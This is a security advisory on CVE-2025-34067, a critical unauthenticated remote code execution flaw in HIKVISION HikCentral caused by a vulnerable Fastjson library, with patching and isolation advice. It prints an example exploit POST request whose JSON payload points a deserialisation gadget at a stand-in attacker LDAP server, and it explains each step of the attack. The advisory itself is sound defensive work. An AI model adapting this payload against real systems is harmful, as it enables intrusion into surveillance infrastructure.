Advisory

Remote code execution flaw reported in HIKVISION Security Management Platforms

Take action: If you have HIKVISION HikCentral security management systems, make sure it's isolated it from the internet and accessible only from trusted networks. Also block outbound LDAP connections, and then plan a quick patch cycle. Because isolation will never be enough with maximum severity flaw.


Learn More

HIKVISION is reporting a critical security vulnerability affecting its applyCT security management platform, also known as HikCentral. It serves as HIKVISION's security management solution to centralize the monitoring and administration of surveillance systems.

The flaw is tracked as CVE-2025-34067 (CVSS score 10.0) and is caused by the platform's use of a vulnerable version of the Fastjson library, which creates a path for unauthenticated remote code execution. The vulnerability affects the /bic/ssoService/v1/applyCT endpoint, which processes JSON input without proper authentication requirements. 

Attackers can craft malicious POST request with JSON payloads that reference the JdbcRowSetImpl class, enabling them to load arbitrary Java classes through malicious LDAP URLs. This attack vector allows threat actors to execute arbitrary code on the underlying system by manipulating the datasource parameter to point to an attacker-controlled LDAP server (intentionally broken example):

POST /bic/ssoService/v1/applyCT HTTP/1.1
Host: vulnerable-hikvision-server.example.com
Content-Type: application/json
Content-Length: 245
 {
  "datasource": "ldap://attacker-server.example.com:1389/ExampleExploit",
  "username": "test_user",
  "loginData": {
    "@type": "com.example.database.FakeRowSetImpl",
    "dataSourceName": "ldap://attacker-server.example.com:1389/ExampleExploit",
    "autoCommit": true
  }
}
  1. Target Endpoint: The request hits /bic/ssoService/v1/applyCT which processes JSON without authentication
  2. Fastjson Exploitation: The @type field tells Fastjson to automatically instantiate a specific Java class (in this example, a fake "FakeRowSetImpl")
  3. LDAP Callback: The dataSourceName parameter containing an LDAP URL causes the system to connect to the attacker's server
  4. Code Execution: When the system connects to ldap://attacker-server.example.com:1389/ExampleExploit, the attacker's LDAP server responds with malicious Java bytecode that gets executed

Organizations should prioritize updating to a patched version of HikCentral that eliminates the use of the vulnerable Fastjson library. As an interim protective measure, administrators should restrict network access to the vulnerable endpoint from untrusted networks and implement monitoring for suspicious outbound LDAP traffic patterns that could indicate exploitation attempts.

Remote code execution flaw reported in HIKVISION Security Management Platforms